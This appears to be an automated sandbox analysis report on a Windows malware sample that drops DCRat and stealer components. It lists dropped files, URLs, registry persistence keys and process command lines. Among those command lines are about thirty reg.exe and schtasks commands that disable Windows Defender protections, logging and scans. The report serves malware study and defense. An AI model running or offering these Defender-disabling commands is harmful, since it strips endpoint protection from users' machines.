Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
FixTsDfhiC.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
initial sample
|
 |
|
|
C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
|
|
|
C:\Program Files\7-Zip\Lang\ukzoUeHPfeDwGdTDRNL.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
|
|
|
C:\Program Files\Windows Portable Devices\ukzoUeHPfeDwGdTDRNL.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
|
|
|
C:\ProgramData\Package Cache\{D5D19E2F-7189-42FE-8103-92CD1FA457C2}v14.36.32532\ukzoUeHPfeDwGdTDRNL.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
|
|
|
C:\Recovery\ukzoUeHPfeDwGdTDRNL.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
|
|
|
C:\Users\Default\ApplicationFrameHost.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\DCRatBuild.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\Nu8jJRNGRr.bat
|
DOS batch file, ASCII text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\windows defender.bat
|
ASCII text
|
dropped
|
|
|
|
C:\Users\user\Videos\ukzoUeHPfeDwGdTDRNL.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\ukzoUeHPfeDwGdTDRNL.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
|
|
|
C:\Windows\AppReadiness\dwm.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
|
|
|
C:\Windows\INF\.NET Data Provider for Oracle\SgrmBroker.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
|
|
|
C:\Windows\Performance\WinSAT\DataStore\ukzoUeHPfeDwGdTDRNL.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
|
|
|
C:\Windows\Setup\State\ukzoUeHPfeDwGdTDRNL.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
|
|
|
C:\blockweb\J6PsSzBYKK7mXTJyYh2Tgne.vbe
|
data
|
dropped
|
|
|
|
C:\blockweb\RuntimeBroker.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
|
|
|
C:\blockweb\WmiPrvSE.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
|
|
|
C:\blockweb\portrefNet.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
|
|
|
C:\blockweb\ukzoUeHPfeDwGdTDRNL.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\4811fe426320bd
|
ASCII text, with very long lines (412), with no line terminators
|
dropped
|
||
|
C:\Program Files\7-Zip\Lang\4811fe426320bd
|
ASCII text, with very long lines (440), with no line terminators
|
dropped
|
||
|
C:\Program Files\Windows Portable Devices\4811fe426320bd
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\ProgramData\Package Cache\{D5D19E2F-7189-42FE-8103-92CD1FA457C2}v14.36.32532\4811fe426320bd
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Recovery\4811fe426320bd
|
ASCII text, with very long lines (657), with no line terminators
|
dropped
|
||
|
C:\Users\Default\6dd19aba3e2428
|
ASCII text, with very long lines (570), with no line terminators
|
dropped
|
||
|
C:\Users\user\4811fe426320bd
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\52cheatand52rat.exe.log
|
CSV text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\portrefNet.exe.log
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\aliRzOxVmS
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\Videos\4811fe426320bd
|
ASCII text, with very long lines (571), with no line terminators
|
dropped
|
||
|
C:\Windows\AppReadiness\6cb0b6c459d5d3
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Windows\INF\.NET Data Provider for Oracle\91e168f4ec1147
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Windows\Performance\WinSAT\DataStore\4811fe426320bd
|
ASCII text, with very long lines (844), with no line terminators
|
dropped
|
||
|
C:\Windows\Setup\State\4811fe426320bd
|
ASCII text, with very long lines (933), with no line terminators
|
dropped
|
||
|
C:\blockweb\24dbde2999530e
|
ASCII text, with very long lines (828), with no line terminators
|
dropped
|
||
|
C:\blockweb\4811fe426320bd
|
ASCII text, with very long lines (893), with no line terminators
|
dropped
|
||
|
C:\blockweb\9e8d7a4ca61bd9
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\blockweb\TOdra8QNG4wQEWkSimCHh9eVG.bat
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\blockweb\file.vbs
|
ASCII text, with no line terminators
|
dropped
|
There are 34 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Users\user\Desktop\FixTsDfhiC.exe
|
"C:\Users\user\Desktop\FixTsDfhiC.exe"
|
|
|
|
C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe
|
"C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\windows defender.bat" "
|
|
|
|
C:\Windows\SysWOW64\reg.exe
|
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
|
|
|
|
C:\Windows\SysWOW64\reg.exe
|
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
|
|
|
|
C:\Windows\SysWOW64\reg.exe
|
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
|
|
|
|
C:\Windows\SysWOW64\reg.exe
|
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
|
|
|
|
C:\Windows\SysWOW64\reg.exe
|
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD
/d "1" /f
|
|
|
|
C:\Windows\SysWOW64\reg.exe
|
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD
/d "1" /f
|
|
|
|
C:\Windows\SysWOW64\reg.exe
|
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD
/d "1" /f
|
|
|
|
C:\Windows\SysWOW64\reg.exe
|
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD
/d "1" /f
|
|
|
|
C:\Windows\SysWOW64\reg.exe
|
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD
/d "1" /f
|
|
|
|
C:\Windows\SysWOW64\reg.exe
|
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1"
/f
|
|
|
|
C:\Windows\SysWOW64\reg.exe
|
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
|
|
|
|
C:\Windows\SysWOW64\reg.exe
|
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
|
|
|
|
C:\Windows\SysWOW64\reg.exe
|
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
|
|
|
|
C:\Windows\SysWOW64\reg.exe
|
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
|
|
|
|
C:\Windows\SysWOW64\reg.exe
|
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
|
|
|
|
C:\Windows\SysWOW64\schtasks.exe
|
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
|
|
|
|
C:\Windows\SysWOW64\schtasks.exe
|
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
|
|
|
|
C:\Windows\SysWOW64\schtasks.exe
|
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
|
|
|
|
C:\Windows\SysWOW64\schtasks.exe
|
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
|
|
|
|
C:\Windows\SysWOW64\schtasks.exe
|
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
|
|
|
|
C:\Windows\SysWOW64\reg.exe
|
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
|
|
|
|
C:\Windows\SysWOW64\reg.exe
|
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
|
|
|
|
C:\Windows\SysWOW64\reg.exe
|
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
|
|
|
|
C:\Windows\SysWOW64\reg.exe
|
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
|
|
|
|
C:\Windows\SysWOW64\reg.exe
|
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
|
|
|
|
C:\Windows\SysWOW64\reg.exe
|
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
|
|
|
|
C:\Windows\SysWOW64\reg.exe
|
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
|
|
|
|
C:\Windows\SysWOW64\reg.exe
|
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
|
|
|
|
C:\Windows\SysWOW64\reg.exe
|
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
|
|
|
|
C:\Windows\SysWOW64\reg.exe
|
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
|
|
|
|
C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe
|
"C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe"
|
|
|
|
C:\Users\user\AppData\Local\Temp\DCRatBuild.exe
|
"C:\Users\user\AppData\Local\Temp\DCRatBuild.exe"
|
|
|
|
C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe
|
"C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe"
|
|
|
|
C:\Windows\SysWOW64\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\blockweb\J6PsSzBYKK7mXTJyYh2Tgne.vbe"
|
|
|
|
C:\Windows\SysWOW64\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\blockweb\file.vbs"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\blockweb\TOdra8QNG4wQEWkSimCHh9eVG.bat" "
|
|
|
|
C:\blockweb\portrefNet.exe
|
"C:\blockweb\portrefNet.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\wbem\WMIC.exe
|
"wmic.exe" csproduct get uuid
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 34 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://cp91897.tw1.ru/@=MzY2MWOkV2N
|
|
||
|
https://github.com/Blank-c/Umbral-Stealer
|
unknown
|
||
|
https://discord.com/api/v10/users/
|
unknown
|
||
|
http://crl.microsoft
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://ip-api.com/json/?fields=225545
|
unknown
|
||
|
http://ip-api.com/line/?fields=hostingI7AB5C494-39F5-4941-9163-47F54D6D5016I032E02B4-0499-05C3-0806-
|
unknown
|
||
|
https://discordapp.com/api/v9/users/
|
unknown
|
||
|
http://ip-api.com/line/?fields=hosting
|
208.95.112.1
|
||
|
http://ip-api.com
|
unknown
|
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
ip-api.com
|
208.95.112.1
|
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
208.95.112.1
|
ip-api.com
|
United States
|
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender
|
DisableAntiSpyware
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender
|
DisableAntiVirus
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine
|
MpEnablePus
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection
|
DisableBehaviorMonitoring
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection
|
DisableIOAVProtection
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection
|
DisableOnAccessProtection
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection
|
DisableRealtimeMonitoring
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection
|
DisableScanOnRealtimeEnable
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting
|
DisableEnhancedNotifications
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet
|
DisableBlockAtFirstSeen
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet
|
SpynetReporting
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet
|
SubmitSamplesConsent
|
|
|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
ukzoUeHPfeDwGdTDRNL
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
ukzoUeHPfeDwGdTDRNL
|
|
|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
dwm
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
dwm
|
|
|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
ApplicationFrameHost
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
ApplicationFrameHost
|
|
|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
RuntimeBroker
|
|
|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
WmiPrvSE
|
|
|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
SgrmBroker
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
|
Shell
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
|
Shell
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
|
Shell
|
|
|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
ukzoUeHPfeDwGdTDRNL
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
ukzoUeHPfeDwGdTDRNL
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
|
Shell
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
|
Shell
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
|
Shell
|
|
|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
ukzoUeHPfeDwGdTDRNL
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
|
Shell
|
|
|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
ukzoUeHPfeDwGdTDRNL
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
ukzoUeHPfeDwGdTDRNL
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
|
Shell
|
|
|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
ukzoUeHPfeDwGdTDRNL
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
|
Shell
|
|
|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
ukzoUeHPfeDwGdTDRNL
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
|
Shell
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
|
Shell
|
|
|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
ukzoUeHPfeDwGdTDRNL
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
|
Shell
|
|
|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
ukzoUeHPfeDwGdTDRNL
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
|
Shell
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
|
Shell
|
|
|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
ukzoUeHPfeDwGdTDRNL
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
|
Shell
|
|
|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
ukzoUeHPfeDwGdTDRNL
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
|
Shell
|
|
|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
ukzoUeHPfeDwGdTDRNL
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
|
Shell
|
|
|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
ukzoUeHPfeDwGdTDRNL
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
|
Shell
|
|
|
|
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WMI\Autologger\DefenderApiLogger
|
Start
|
||
|
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WMI\Autologger\DefenderAuditLogger
|
Start
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\System32\WScript.exe.FriendlyAppName
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\System32\WScript.exe.ApplicationCompany
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\52cheatand52rat_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\52cheatand52rat_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\52cheatand52rat_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\52cheatand52rat_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\52cheatand52rat_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\52cheatand52rat_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\52cheatand52rat_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\52cheatand52rat_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\52cheatand52rat_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\52cheatand52rat_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\52cheatand52rat_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\52cheatand52rat_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\52cheatand52rat_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\52cheatand52rat_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\SOFTWARE\06e2b670deeeb0369e0a6228b922328bd20fd44e
|
d0712a2905e1838191a878887475e857bd799d9b
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\System32\cmd.exe.FriendlyAppName
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\System32\cmd.exe.ApplicationCompany
|
There are 64 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
1B56000
|
heap
|
page read and write
|
|
|
|
4F70000
|
heap
|
page read and write
|
|
|
|
2561000
|
trusted library allocation
|
page read and write
|
|
|
|
2774000
|
trusted library allocation
|
page read and write
|
|
|
|
1256F000
|
trusted library allocation
|
page read and write
|
|
|
|
239BB8D2000
|
unkown
|
page readonly
|
|
|
|
1B1E000
|
heap
|
page read and write
|
|
|
|
2D30000
|
heap
|
page read and write
|
||
|
2CEE000
|
stack
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
1879000
|
unkown
|
page execute read
|
||
|
19A9870A000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
33AF000
|
heap
|
page read and write
|
||
|
19A9A3CD000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
B0E000
|
heap
|
page read and write
|
||
|
1B97B000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
2B9D000
|
stack
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3350000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
2AF2000
|
stack
|
page read and write
|
||
|
35BF000
|
stack
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
27FA000
|
trusted library allocation
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
2E80000
|
heap
|
page read and write
|
||
|
19A984BB000
|
heap
|
page read and write
|
||
|
1C74000
|
heap
|
page read and write
|
||
|
738C0FD000
|
stack
|
page read and write
|
||
|
404000
|
unkown
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
B03000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
1190000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
4E97000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
2C1D000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
2AC0000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
2BE0000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
2D38000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
BF2FDFE000
|
stack
|
page read and write
|
||
|
1C74000
|
heap
|
page read and write
|
||
|
33BC000
|
heap
|
page read and write
|
||
|
1B630000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
33B8000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
1C75000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
7FFD9B9CC000
|
trusted library allocation
|
page read and write
|
||
|
19A98488000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
28BD000
|
stack
|
page read and write
|
||
|
310D000
|
stack
|
page read and write
|
||
|
3080000
|
heap
|
page read and write
|
||
|
2F00000
|
heap
|
page read and write
|
||
|
19A4000
|
heap
|
page read and write
|
||
|
2730000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
6D00000
|
trusted library allocation
|
page read and write
|
||
|
29E0000
|
heap
|
page read and write
|
||
|
19A98450000
|
heap
|
page read and write
|
||
|
704F000
|
stack
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
2C4C000
|
heap
|
page read and write
|
||
|
4BCE000
|
stack
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
738C077000
|
stack
|
page read and write
|
||
|
19A98491000
|
heap
|
page read and write
|
||
|
B04000
|
heap
|
page read and write
|
||
|
2AE9000
|
stack
|
page read and write
|
||
|
7FFD9BBC1000
|
trusted library allocation
|
page read and write
|
||
|
19A4000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
4A2F000
|
stack
|
page read and write
|
||
|
2CBE000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3581000
|
heap
|
page read and write
|
||
|
